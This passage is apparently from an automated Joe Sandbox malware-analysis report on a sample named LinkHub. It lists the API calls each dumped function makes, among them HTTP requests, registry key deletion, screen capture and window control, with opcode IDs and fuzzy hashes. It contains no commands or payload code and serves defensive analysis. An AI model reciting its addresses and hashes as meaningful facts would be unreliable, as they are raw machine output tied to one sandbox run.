                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID: <)-
                                                                                        • API String ID: 641708696-3551069816
                                                                                        • Opcode ID: d0c9084239243a1047780c685e456725ee374a79b48ba7db724bc42b2b46aa9f
                                                                                        • Instruction ID: 7e1fb8b4dda8a866c12c49f17a4e5ab5451e74827ca329dc7958f618c91625b8
                                                                                        • Opcode Fuzzy Hash: d0c9084239243a1047780c685e456725ee374a79b48ba7db724bc42b2b46aa9f
                                                                                        • Instruction Fuzzy Hash: 61618C30921712DFDB398F15E958B69BBB1FB90312FA0411AE4424B6B1C770ACB9DF44
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0027CEF5
                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0027CF08
                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0027CF1C
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0027CF35
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0027CF78
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0027CF8E
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0027CF99
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0027CFC9
                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0027D021
                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0027D035
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0027D040
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 3800310941-3916222277
                                                                                        • Opcode ID: 3c1b217869dcc4904c9b530f37f47546749c88cfd40aafa70c8c7f5331f24ed4
                                                                                        • Instruction ID: 08f3ecaf7647dd2dd04c956d2e804de441cc64820f71bbf43e4edabccc29c966
                                                                                        • Opcode Fuzzy Hash: 3c1b217869dcc4904c9b530f37f47546749c88cfd40aafa70c8c7f5331f24ed4
                                                                                        • Instruction Fuzzy Hash: C9519EB1510605BFDB219FB0DD88AABBBBCFF08344F10841EF94986210D734D965AB61
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002966D6,?,?), ref: 00298FEE
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00298FFE
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299009
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299016
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00299024
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299033
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0029903C
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299043
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299054
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,002A0C04,?), ref: 0029906D
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0029907D
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0029909D
                                                                                        • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 002990CD
                                                                                        • DeleteObject.GDI32(00000000), ref: 002990F5
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0029910B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3840717409-0
                                                                                        • Opcode ID: e2c4c123b2e67b2e83fe781e74cfb33a0e49e1a7e5ef447b0fa899c555070c56
                                                                                        • Instruction ID: 8dfcd14373811538fe142b0749895abf9835ba22befa620b8368f7e720e23b81
                                                                                        • Opcode Fuzzy Hash: e2c4c123b2e67b2e83fe781e74cfb33a0e49e1a7e5ef447b0fa899c555070c56
                                                                                        • Instruction Fuzzy Hash: 7B414975600209BFDB219F69EC8CEAE7BB8FF89721F10405AF919D7260D7709941DB20
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 0028D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028C10E,?,?), ref: 0028D415
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D451
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4C8
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4FE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C154
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028C1D2
                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 0028C26A
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0028C2DE
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0028C2FC
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0028C352
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0028C364
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0028C382
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0028C3E3
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028C3F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 146587525-4033151799
                                                                                        • Opcode ID: 80fa6f6ee4d33993c7d6d8ce302f49752641263d241872a5d331eca839138f58
                                                                                        • Instruction ID: 9ab4da65e5f5b3404b75d19f19df783b8034f9e592d7b38c6ad4e850c58500cd
                                                                                        • Opcode Fuzzy Hash: 80fa6f6ee4d33993c7d6d8ce302f49752641263d241872a5d331eca839138f58
                                                                                        • Instruction Fuzzy Hash: FBC16B34225302AFD710EF64C485F2ABBE5AF84314F64849DF45A8B6E2CB71E856CF91
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0029A990
                                                                                        • GetSystemMetrics.USER32(00000011), ref: 0029A9A7
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0029A9B3
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0029A9C9
                                                                                        • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0029AC15
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0029AC33
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0029AC54
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0029AC73
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0029AC95
                                                                                        • DefDlgProcW.USER32(?,00000005,?), ref: 0029ACBB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                        • String ID: @$(-
                                                                                        • API String ID: 3962739598-2144042105
                                                                                        • Opcode ID: 154f2cd29c89361d8832e496140fefecd6c5d81989dd9f9c752439ff683e5f3f
                                                                                        • Instruction ID: e9eb0353798632c65dc3703bdabead8db1e8079224ba59b7c86bc5b62731c325
                                                                                        • Opcode Fuzzy Hash: 154f2cd29c89361d8832e496140fefecd6c5d81989dd9f9c752439ff683e5f3f
                                                                                        • Instruction Fuzzy Hash: 3FB18C3151031ADFDF14CF68C9897AE7BB2BF44705F14806AEC49AF295D770A9A0CB91
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002997B6
                                                                                        • GetFocus.USER32 ref: 002997C6
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 002997D1
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00299879
                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0029992B
                                                                                        • GetMenuItemCount.USER32(?), ref: 00299948
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00299958
                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0029998A
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002999CC
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002999FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                        • String ID: 0$(-
                                                                                        • API String ID: 1026556194-2476977234
                                                                                        • Opcode ID: 00e187c99926abb0bc5f25a0b453354c0f9f4c42e98028f7db768093f08a317c
                                                                                        • Instruction ID: eb5f34443f0525e287821a1f75d57ee14f29640d67108ac8554a4b2aebef002a
                                                                                        • Opcode Fuzzy Hash: 00e187c99926abb0bc5f25a0b453354c0f9f4c42e98028f7db768093f08a317c
                                                                                        • Instruction Fuzzy Hash: 9581D5715243029FDB10CF28D888AAB7BE8FF89324F14091EF98597291D771D995CFA2
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00283035
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00283045
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00283051
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0028305E
                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 002830CA
                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00283109
                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0028312D
                                                                                        • SelectObject.GDI32(?,?), ref: 00283135
                                                                                        • DeleteObject.GDI32(?), ref: 0028313E
                                                                                        • DeleteDC.GDI32(?), ref: 00283145
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00283150
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 6ade88dfa7605df8ef07733806672318ce86668525a6e314ab95bfcf43442be0
                                                                                        • Instruction ID: e33be8b3b232b9d24d94d68749071a4f247e3863561b3847bb1b8a7498d95790
                                                                                        • Opcode Fuzzy Hash: 6ade88dfa7605df8ef07733806672318ce86668525a6e314ab95bfcf43442be0
                                                                                        • Instruction Fuzzy Hash: 6B611475D10219EFCF04DFA4D888EAEBBB5FF48710F20841AE559A7250D771A911DF90
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 002652E6
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00265328
                                                                                        • _wcslen.LIBCMT ref: 00265339
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00265345
                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0026537A
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 002653B2
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 002653EB
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00265445
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00265477
                                                                                        • GetWindowRect.USER32(?,?), ref: 002654EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                        • String ID: ThumbnailClass
                                                                                        • API String ID: 1311036022-1241985126
                                                                                        • Opcode ID: 516b68f7a491d099b690d07cb3d3797b7df3a829f2a8c3a3de8370c0c732bb2d
                                                                                        • Instruction ID: 2bdb14a64c03c7a10f30ce30bf120d4960ac1bff09a373c5aabd093a596de72f
                                                                                        • Opcode Fuzzy Hash: 516b68f7a491d099b690d07cb3d3797b7df3a829f2a8c3a3de8370c0c732bb2d
                                                                                        • Instruction Fuzzy Hash: AC91F471124B17AFD718DF24D898BAAB7A9FF00304F504519FA8A82191EB31EDB5CF91
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(002D29C0,000000FF,00000000,00000030), ref: 0026C973
                                                                                        • SetMenuItemInfoW.USER32(002D29C0,00000004,00000000,00000030), ref: 0026C9A8
                                                                                        • Sleep.KERNEL32(000001F4), ref: 0026C9BA
                                                                                        • GetMenuItemCount.USER32(?), ref: 0026CA00
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0026CA1D
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 0026CA49
                                                                                        • GetMenuItemID.USER32(?,?), ref: 0026CA90
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0026CAD6
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0026CAEB
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0026CB0C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                         • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                         • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                        • String ID: 0
                                                                                        • API String ID: 1460738036-4108050209
                                                                                        • Opcode ID: d879e99c31e20d901a787fc76ff449f543461ec9db3e43ca9c7f8bb825eb88d2
                                                                                        • Instruction ID: 21a9c7f8150015e3e16bdf38fd08e866b53a67128a337bce375eb1780f2f3093
                                                                                        • Opcode Fuzzy Hash: d879e99c31e20d901a787fc76ff449f543461ec9db3e43ca9c7f8bb825eb88d2
                                                                                        • Instruction Fuzzy Hash: CA61C57092024AAFDF11EFA4DD89AFE7BB8FF05348F240055E891A3251D731ADA4DB60
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 0026E4D4
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0026E4FA
• _wcslen.LIBCMT ref: 0026E504
• _wcsstr.LIBVCRUNTIME ref: 0026E554
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0026E570
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
• Opcode ID: 790771bf0f2618703a4e0f9f9a5d26ccf88fc5788517e2141aea9fbf39509a0e
• Instruction ID: 693a0d2650f9135e5c9759ea80d065a7ae2a11bcbfec19858d7c4d5d63d7102b
• Opcode Fuzzy Hash: 790771bf0f2618703a4e0f9f9a5d26ccf88fc5788517e2141aea9fbf39509a0e
• Instruction Fuzzy Hash: 834147725202247BEF00ABA4EC47EFF776CDF51710F50015AF905A6082EB749A71AAA5
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0028D6C4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0028D6ED
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0028D7A8
  • Part of subcall function 0028D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0028D70A
  • Part of subcall function 0028D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0028D71D
  • Part of subcall function 0028D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0028D72F
  • Part of subcall function 0028D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0028D765
  • Part of subcall function 0028D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0028D788
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0028D753
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2734957052-4033151799
• Opcode ID: 08b8e094e73d9e082c6c709de165bce01a57342f67177df5f37832e23f520a64
• Instruction ID: 6494ed449007d9bd13edd67eb350983e1702b006ad6d7b78c6fd9e125c0a6efa
• Opcode Fuzzy Hash: 08b8e094e73d9e082c6c709de165bce01a57342f67177df5f37832e23f520a64
• Instruction Fuzzy Hash: 5D316176912129BBD721AF50EC88EFFBB7CEF46710F000166F905E2180DB749E599BA0
APIs
• timeGetTime.WINMM ref: 0026EFCB
  • Part of subcall function 0021F215: timeGetTime.WINMM(?,?,0026EFEB), ref: 0021F219
• Sleep.KERNEL32(0000000A), ref: 0026EFF8
• EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0026F01C
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0026F03E
• SetActiveWindow.USER32 ref: 0026F05D
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0026F06B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0026F08A
• Sleep.KERNEL32(000000FA), ref: 0026F095
• IsWindow.USER32 ref: 0026F0A1
• EndDialog.USER32(00000000), ref: 0026F0B2
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: e88cf7f10601f7ee337634048ccc19d39e22100b9f22250dc43b69b015583f79
• Instruction ID: c4e614d26e858ea564ee6f047895ca354a560f3fd2bda19e9a112d95949e9bd4
• Opcode Fuzzy Hash: e88cf7f10601f7ee337634048ccc19d39e22100b9f22250dc43b69b015583f79
• Instruction Fuzzy Hash: B4210575929205BFEB10AF30FC8DB267B6DF759754F000027F80582276DB728CA49BA2
APIs
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0026F374
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0026F38A
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026F39B
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0026F3AD
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0026F3BE
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: a1c0be87eb4e4c467bf79f48b8dd4078c6b9019b69b9216fe7cef782f88e8d02
• Instruction ID: 3f14a3057147a6b53d9f4a52c648d070d62484363ca55f6b25cce51ee950edae
• Opcode Fuzzy Hash: a1c0be87eb4e4c467bf79f48b8dd4078c6b9019b69b9216fe7cef782f88e8d02
• Instruction Fuzzy Hash: 3E119171A702997ADB20A7669C4AFFF7A7CEB96B40F4005697401E20D1DAA05964C9A0
APIs
• _free.LIBCMT ref: 00233007
